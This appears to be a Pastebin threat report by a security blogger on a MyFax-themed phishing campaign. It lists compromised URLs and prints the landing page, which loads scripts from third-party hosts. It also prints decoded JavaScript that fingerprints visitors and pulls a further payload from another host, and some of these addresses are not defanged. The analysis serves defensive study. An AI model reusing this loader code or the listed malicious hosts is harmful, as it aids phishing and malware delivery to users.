Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Phishing Attempt Details
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- ****
- Similar to what this blog reported http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html
- ****
- you see an email from MyFax [[email protected]]
- ****
- The body contains a link to a url like this that always ends with "docs/new_fax.html"
- hxxp://381main.com/docs/new_fax.html
- hxxp://blustoneentertainment.com/docs/new_fax.html
- hxxp://claimquest123.com/docs/new_fax.html
- hxxp://www.drhousesrl.it/docs/new_fax.html
- hxxp://dutawirautama.com/documents/message.html
- hxxp://espaceetconfort.free.fr/docs/new_fax.html
- hxxp://netsh105951.web13.net-server.de/docs/new_fax.html
- hxxp://njstangers.org/docs/new_fax.html
- hxxp://patresearch.com/docs/new_fax.html
- hxxp://powderroomplayground.com/docs/new_fax.html
- hxxp://prosperprogram.org/docs/new_fax.html
- hxxp://pyramidautomation.com/docs/new_fax.html
- hxxp://raffandraff.com/docs/new_fax.html
- hxxp://regimentalblues.co.uk/docs/new_fax.html
- hxxp://rewelacja.eu/docs/new_fax.html
- hxxp://stamfordicenter.com/docs/new_fax.html
- hxxp://stylista.com.cy/docs/new_fax.html
- hxxp://win.org.ro/docs/new_fax.html
- NOTE: There are many more urls as this pastebin listed http://pastebin.com/uxgVykUB
- ***
- The body of the new_fax.html always contains
- <!DOCTYPE html>
- <html>
- <head>
- <title>Page Title</title>
- <script type="text/javascript" src="http://girardimusicstudio.com/js/jquery-1.7.50.js"></script>
- <script type="text/javascript" src="http://blackstonebikes.co.uk/js/jquery-1.7.50.js"></script>
- </head>
- <body>
- </body>
- </html>
- ***
- The 2 javascript files linked are jjencode and depend on the parameters passed also, which when decrypted show either
- With no parameters you get something like this
- (0, 'moved = 0;\nbesend = false;\nfunction get_query() {\n besend = true;\n
- ua = navigator.userAgent;wd = screen.width;hg = screen.height;pl = navigator.p
- latform;\n var tmp1 = document.createElement("script"); tmp1.type = "text/jav
- ascript"; tmp1.async = true;\n tmp1.src = "http://stylista.com.cy/js/jquery-1
- .7.50.js?t1=" + ua + "&t2=" + wd + "&t3=" + hg + "&t4=1083747684&t5=" + moved +
- "&t6=519.js";\n var tmp2 = document.getElementsByTagName("script")[0];\n t
- mp2.parentNode.insertBefore(tmp1, tmp2);\n}\ndocument.onmousemove = function(){m
- oved = 1;clearTimeout(timeout);if ((!besend)) {get_query();}\n}\ntimeout = setTi
- meout(function(){if ((!moved) && (!besend)) {get_query();besend = true}}, 20000
- );')
- With shows you that parameters being passed are
- t1 = ua = useragent
- t2 = wg = screen width
- t3 = hg = screen height
- t4 = some identifying number
- t5 = 1 or 0
- t6 = random javascript file name
- If you make calls to that link with parameters you may get random words like these
- http://stylista.com.cy/js/jquery-1.7.50.js?t1=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36&t2=1920&t3=1080&t4=1083747684&t5=1&t6=2964.js (21.06%)
- (0, 'document.write("altogether sort prevent take behind list:<li>held itself ag
- ain prevent kill</li><li>held like again could grunt</li><li>fish poor straighte
- nin much tight</li><li>some engine doubling again nursing</li><li>arms made whic
- h words sneezing</li><li>little creature hold carried leave</li><li>some legs li
- ke engine much</li><li>creature arms like first grunted</li><li>Alice hold which
- right leave</li><li>legs like that leave time</li>");')
- (0, 'document.write("keep undoing away leave behind list:<li>directions engine t
- hat sure sneezing</li><li>directions steam minute prevent Dont</li><li>like righ
- t foot loud grunted</li><li>when which this child leave</li><li>straightenin int
- o knot keep time</li><li>shaped straightenin soon nursing open</li><li>difficult
- y made take away grunt</li><li>caught queer star much Dont</li>");')
- (0, 'document.write("shaped kept itself open this list:<li>when could soon last
- words</li><li>creature could open behind said</li><li>first then undoing open ki
- ll</li><li>arms itself minute knot behind</li><li>shaped much proper right dont<
- /li><li>engine that prevent take this</li><li>some that nursing then child</li><
- li>queer when this time Dont</li>");')
- (0, 'document.write("some just thing left Dont list:<li>little creature carried
- take this</li><li>some snorting altogether first prevent</li><li>thought itself
- take sure behind</li><li>queer engine straightenin sure last</li><li>shaped alto
- gether hold keep dont</li><li>altogether made nursing undoing behind</li><li>som
- e poor kept that proper</li><li>when minute much nursing prevent</li><li>difficu
- lty thing proper right murder</li><li>Alice held first away kill</li><li>Alice d
- irections poor sneezing Dont</li>");')
- But sometimes depending on the parameters as this blog states
- https://techhelplist.com/index.php/component/tags/tag/36-fax
- You get "Read Message" which gives you the chance to download a malicious file
- ****
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement